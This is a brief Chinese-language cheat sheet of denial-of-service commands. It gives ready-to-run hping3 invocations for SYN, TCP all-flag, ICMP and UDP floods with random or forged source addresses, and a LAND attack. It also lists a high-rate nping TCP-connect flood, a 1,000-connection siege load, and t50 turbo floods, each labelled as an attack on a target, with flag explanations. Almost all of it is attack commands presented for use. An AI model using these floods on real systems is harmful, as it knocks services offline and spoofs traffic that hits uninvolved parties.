Hping3
几乎可以定制发送任何tcp/ip数据包,用于测试fw,端口扫描,性能测试
Syn Flood
– hping3 -c 1000 -d 120 -S -w 64 -p 80 --flood --rand-source 1.1.1.1 //一条命令搞定
-c 计数器,多次数据包 -d 数据包多大 -S syn包 -p 目标攻击端口 --flood泛洪方式
--rand-source:随机源地址 1.1.1.1 攻击的目标 另外一种组合:
– hping3 -S -P -U -p 80 --flood --rand-source 1.1.1.1 TCP Flood攻击:
– hping3 -SARFUP -p 80 --flood --rand-source 1.1.1.1
-SARFUP标记类全标记满 ICMP Flood攻击
– hping3 -q -n -a 1.1.1.1 --icmp -d 56 --flood 1.1.1.2
-q:安静模式 -n:不作域名解析 -a:伪造源地址 UDP Flood
– hping3 -a 1.1.1.1 --udp -s 53 -d 100 -p 53 --flood 1.1.1.2
-s:指定源端口,不指定也可以 LAND攻击
– 伪造源地址和目标地址都是自己,造成自己打自己
– hping3 -n -a 1.1.1.1 -S -d 100 -p 80 --flood 1.1.1.1
nping
TCP全链接DoS攻击
– nping --tcp-connect --rate=10000 -c 1000000000 -q 192.168.33.135
--tcp-connect:建立tcp连接 --rate=10000:速率一万个
Siege
– http/https 压力测试
– siege -i -c 1000 http://1.1.1.1/a.php -A htttttp
-c 1000个并发连接
-A 自定义http头,随便写都可以
– 同时攻击多个url,-f 使用字典
/etc/siege/urls.txt
T50
– t50 1.1.1.1 --flood --turbo -S --protocol TCP --dport 80
– t50 1.1.1.1 --flood --turbo -S TCP UDP OSPF EIGRP --dport 22